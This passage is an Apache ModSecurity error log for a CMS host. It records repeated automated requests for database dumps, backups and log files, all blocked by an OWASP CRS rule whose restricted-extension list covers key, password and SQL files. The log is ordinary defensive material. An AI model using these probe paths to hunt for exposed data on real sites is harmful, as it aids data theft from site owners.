[hostname "cms.dev-unit.com"] [uri "/error.log"] [unique_id "aTIZuZnwJUCRcFMitsHeCgAAANQ"] [Fri Dec 05 01:31:08.886605 2025] [:error] [pid 14227:tid 14239] [client 54.255.245.214:45754] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aTIZvNtUeEOEcBEcGokUAwAAAIo"] [Fri Dec 05 01:31:09.507454 2025] [:error] [pid 14020:tid 14094] [client 54.255.245.214:45814] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database.sql"] [unique_id "aTIZvSKlF99DO7XaM50FYwAAAEI"] [Fri Dec 05 01:31:10.124344 2025] [:error] [pid 14019:tid 14076] [client 54.255.245.214:45888] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/backup.sql"] [unique_id "aTIZvixVk-zXn9iOn0mV4wAAAAs"] [Fri Dec 05 01:31:10.741311 2025] [:error] [pid 14163:tid 14188] [client 54.255.245.214:45972] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/debug.log"] [unique_id "aTIZvpnwJUCRcFMitsHeJAAAANc"] [Fri Dec 05 01:31:12.086671 2025] [:error] [pid 14227:tid 14230] [client 54.255.245.214:46134] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/dump.sql"] [unique_id "aTIZwNtUeEOEcBEcGokUCwAAAIE"] [Fri Dec 05 01:31:17.091421 2025] [:error] [pid 14020:tid 14095] [client 54.255.245.214:46680] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/db_backup.sql"] [unique_id "aTIZxSKlF99DO7XaM50FagAAAEM"] [Fri Dec 05 01:31:34.157917 2025] [:error] [pid 14020:tid 14112] [client 54.255.245.214:48600] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/php_error.log"] [unique_id "aTIZ1iKlF99DO7XaM50FeQAAAFQ"] [Fri Dec 05 01:31:42.819840 2025] [:error] [pid 14019:tid 14075] [client 54.255.245.214:49564] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/errors.log"] [unique_id "aTIZ3ixVk-zXn9iOn0mWAwAAAAo"] [Fri Dec 05 01:31:44.171193 2025] [:error] [pid 14163:tid 14188] [client 54.255.245.214:49716] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/application.log"] [unique_id "aTIZ4JnwJUCRcFMitsHefgAAANc"] [Fri Dec 05 01:31:44.787257 2025] [:error] [pid 14227:tid 14250] [client 54.255.245.214:49774] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/app/logs/dev.log"] [unique_id "aTIZ4NtUeEOEcBEcGokUagAAAJU"] [Fri Dec 05 01:31:45.403679 2025] [:error] [pid 14163:tid 14171] [client 54.255.245.214:49830] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/app/logs/prod.log"] [unique_id "aTIZ4ZnwJUCRcFMitsHeggAAAMY"] [Fri Dec 05 01:31:46.018853 2025] [:error] [pid 14163:tid 14184] [client 54.255.245.214:49884] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/Thumbs.db"] [unique_id "aTIZ4pnwJUCRcFMitsHehgAAANM"] [Sat Dec 06 11:12:54.388124 2025] [:error] [pid 28201:tid 28206] [client 16.146.2.134:49238] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/error.log"] [unique_id "aTPzlgaaBQA8K9Y2IUPbrAAAAAM"] [Sat Dec 06 11:12:55.795428 2025] [:error] [pid 27204:tid 27222] [client 16.146.2.134:49264] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aTPzl_OyaOnBaPk9al_LfAAAAEE"] [Sat Dec 06 11:12:56.430438 2025] [:error] [pid 28201:tid 28214] [client 16.146.2.134:49266] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database.sql"] [unique_id "aTPzmAaaBQA8K9Y2IUPbsAAAAAo"] [Sat Dec 06 11:12:57.079396 2025] [:error] [pid 27206:tid 27279] [client 16.146.2.134:49276] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/backup.sql"] [unique_id "aTPzmTVNQf_oW9-JXCoOvgAAAJM"] [Sat Dec 06 11:12:57.719931 2025] [:error] [pid 28201:tid 28230] [client 16.146.2.134:49280] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/debug.log"] [unique_id "aTPzmQaaBQA8K9Y2IUPbsgAAABg"] [Sat Dec 06 11:12:59.110612 2025] [:error] [pid 27209:tid 27258] [client 16.146.2.134:49306] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/dump.sql"] [unique_id "aTPzm-suS7TwaJcc3vHzsQAAAME"] [Sat Dec 06 11:13:04.215294 2025] [:error] [pid 28201:tid 28219] [client 16.146.2.134:54198] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/db_backup.sql"] [unique_id "aTPzoAaaBQA8K9Y2IUPbwwAAAA8"] [Sat Dec 06 11:13:19.286701 2025] [:error] [pid 27206:tid 27287] [client 16.146.2.134:41178] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/php_error.log"] [unique_id "aTPzrzVNQf_oW9-JXCoO0gAAAJc"] [Sat Dec 06 11:13:28.296377 2025] [:error] [pid 27204:tid 27239] [client 16.146.2.134:47774] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/errors.log"] [unique_id "aTPzuPOyaOnBaPk9al_LpQAAAFI"] [Sat Dec 06 11:13:29.718447 2025] [:error] [pid 27206:tid 27274] [client 16.146.2.134:47802] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/application.log"] [unique_id "aTPzuTVNQf_oW9-JXCoO2QAAAJA"] [Sat Dec 06 11:13:30.360603 2025] [:error] [pid 27209:tid 27266] [client 16.146.2.134:47806] [client 16.146.2.134] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag 